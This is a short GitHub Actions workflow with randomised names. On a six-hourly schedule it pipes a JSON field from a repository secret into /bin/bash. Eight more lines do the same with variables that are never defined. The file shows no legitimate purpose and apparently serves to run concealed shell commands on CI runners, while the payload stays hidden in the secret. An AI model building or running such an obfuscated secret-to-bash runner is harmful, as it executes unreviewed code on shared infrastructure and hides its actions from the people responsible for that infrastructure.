name: nijiuhen6152

on:
  workflow_dispatch:
  schedule:
    - cron: '49 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: nijiuhen6152
        env:
          df602: ${{ secrets.df602 }}
        run: |
          echo $df602 | jq -r .somq55 | /bin/bash
          echo $dhma47204 | jq -r .o40 | /bin/bash
          echo $unqj127 | jq -r .um8136 | /bin/bash
          echo $ncj63 | jq -r .vkrs17 | /bin/bash
          echo $ljdy422 | jq -r .n71 | /bin/bash
          echo $x732 | jq -r .imj857 | /bin/bash
          echo $r87538 | jq -r .jmcey53678 | /bin/bash
          echo $oue6021 | jq -r .jlfia60218 | /bin/bash
          echo $n516 | jq -r .kq84064 | /bin/bash

